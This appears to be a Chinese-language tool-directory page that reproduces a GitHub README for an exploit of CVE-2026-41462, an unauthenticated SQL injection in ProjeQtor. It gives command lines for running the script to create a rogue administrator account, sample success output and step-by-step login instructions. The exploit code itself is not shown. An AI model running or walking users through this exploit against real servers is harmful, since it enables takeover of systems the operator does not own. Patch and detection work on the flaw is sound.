Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41462 — CVE-2026-41462 | Kitploit
工具/GitHubGitHub/0xblackash/cve-2026-41462
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xblackash/cve-2026-41462

CVE-2026-41462

CVE-2026-41462

查看仓库
13个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2026-41462 - ProjeQtor 未认证 SQL 注入

projeqtor_cover

ProjeQtor ≤ 12.4.3 中的严重未认证 SQL 注入

Critical CVSS 9.8 Unauthenticated

📌 概述

CVE-2026-41462 是 ProjeQtor 项目管理工具登录功能中的一个严重未认证 SQL 注入漏洞。

  • CVE ID:CVE-2026-41462
  • 影响版本:ProjeQtor 7.0 至 12.4.3
  • 已修复版本:12.4.4
  • 严重性:严重(CVSS 9.8)
  • 类型:未认证堆叠式 SQL 注入

🛠️ 利用方式

使用方法

root@kitploit:~
python3 CVE-2026-41462.py -u http://target.com --create-admin

# 使用自定义凭据
python3 CVE-2026-41462.py -u http://target.com --create-admin \
  --username admin123 --password StrongPass2026!

📊 成功利用后的表现

当漏洞利用成功时,您将看到类似如下的输出:

root@kitploit:~
[+] 目标:http://target.com
[+] 正在发送用于创建管理员用户 'hacker' 的 payload……
[+] 请求发送成功。
[+] 已创建新管理员 → 用户名:hacker | 密码:Admin123!
[+] 请尝试登录:http://target.com/login.php

运行利用脚本后:

  1. 打开浏览器并访问:
    http://target.com/login.php

  2. 使用脚本输出中显示的凭据登录。

  3. 如果成功,您将进入 ProjeQtor 管理仪表板,并拥有完全的管理权限。

成功标志:

  • 您可以查看所有项目、用户和系统设置
  • 您可以无限制地创建/编辑/删除项目
  • 用户管理部分会出现新用户

📁 仓库内容

文件描述
CVE-2026-41462.py主要利用脚本
CVE-2026-41462.yamlNuclei 检测模板
README.md本文档

🚀 快速开始

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-41462.git
    cd CVE-2026-41462
    
  2. 运行利用脚本:

    root@kitploit:~
    python3 CVE-2026-41462.py -u http://target.com --create-admin
    
  3. 使用新创建的管理员账户登录。


⚠️ 免责声明

此工具仅用于教育目的和授权渗透测试。未经授权使用属违法行为。


📄 参考

  • NVD - CVE-2026-41462
  • 官方 ProjeQtor 补丁(v12.4.4+)

负责任披露 • 仅限道德黑客行为
保持安全。合法测试。
下载工具